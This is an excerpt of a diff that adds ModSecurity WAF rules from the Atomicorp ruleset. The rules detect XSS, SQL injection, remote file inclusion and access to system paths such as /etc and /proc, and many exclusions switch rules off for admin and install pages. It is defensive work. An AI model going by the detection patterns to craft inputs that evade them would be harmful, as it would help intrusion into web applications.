"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340847,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+# Rule 340149:  XSS injection
+SecRule REQUEST_URI|ARGS|!ARGS:/token/|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340848,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+SecMarker END_RULES_91566
+
+SecRule REQUEST_FILENAME "/admin/write\.php" "phase:2,id:91567,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91568,t:none,pass,nolog,skipAfter:END_RULES_91568"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/text/|!ARGS:/movie/|!ARGS:/message/|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comments|!ARGS:text|!ARGS:/descr/|!ARGS:/^sql/|!ARGS:contactMessage|!ARGS:cts|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:introtext|!ARGS:Post|!ARGS:sql_query|!ARGS:itembigtext|!ARGS:article_content|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:response[14]|!ARGS:/article/ "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\bunion\b.{1,100}?\bselect\b.*[a-z0-9].*from)"   	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:340849,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection'"
+
+SecMarker END_RULES_91568
+
+SecRule REQUEST_FILENAME "/admin/addvideo\.php" "phase:2,id:91569,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/installation/install3\.php" "phase:2,id:91570,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
+
+SecRule REQUEST_FILENAME "/installation/install\.php" "phase:2,id:91571,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:91572,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
+
+SecRule REQUEST_FILENAME "/categorie\.php" "phase:2,id:91573,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91574,t:none,pass,nolog,skipAfter:END_RULES_91574"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/iframe/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340850,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/iframe/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340851,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91574
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:91575,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/quick_reply\.php" "phase:2,id:91576,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:91577,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:91578,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/glossary\.pl" "phase:2,id:91579,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin-create-edit-page\.php" "phase:2,id:91580,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/question/question\.php" "phase:2,id:91581,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/" "phase:2,id:91582,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/administrator/" "phase:2,id:91583,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/adm/" "phase:2,id:91584,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/typo3/" "phase:2,id:91585,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/typo3/ajax\.php" "phase:2,id:91586,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/setup/" "phase:2,id:91587,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/portal/index\.php" "phase:2,id:91588,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009"
+SecAction "phase:2,id:91589,t:none,pass,nolog,skipAfter:END_RULES_91589"
+
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:/highlight/|!ARGS:name|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/description/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/content/|!ARGS:/data/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/description/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:/body/ "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|tmp|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:normalisePath,t:lowercase,capture,id:340860,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91589
+
+SecRule REQUEST_FILENAME "/components/com_zoom/etc/" "phase:2,id:91590,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/admin_orders\.php" "phase:2,id:91591,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/setup\.jspa" "phase:2,id:91592,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/pages\.php" "phase:2,id:91593,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/sql\.php3" "phase:2,id:91594,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/sql\.php" "phase:2,id:91595,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/ipn_main_handler\.php" "phase:2,id:91596,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91597,t:none,pass,nolog,skipAfter:END_RULES_91597"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/^item_name/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340870,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/^item_name/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"  	"phase:2,deny,log,auditlog,status:403,capture,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340871,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/^item_name/|!ARGS:newyddionc|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340872,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+
+SecMarker END_RULES_91597
+
+SecRule REQUEST_FILENAME "/xcloner\.php" "phase:2,id:91598,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/cms/content\.php" "phase:2,id:91599,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91600,t:none,pass,nolog,skipAfter:END_RULES_91600"
+
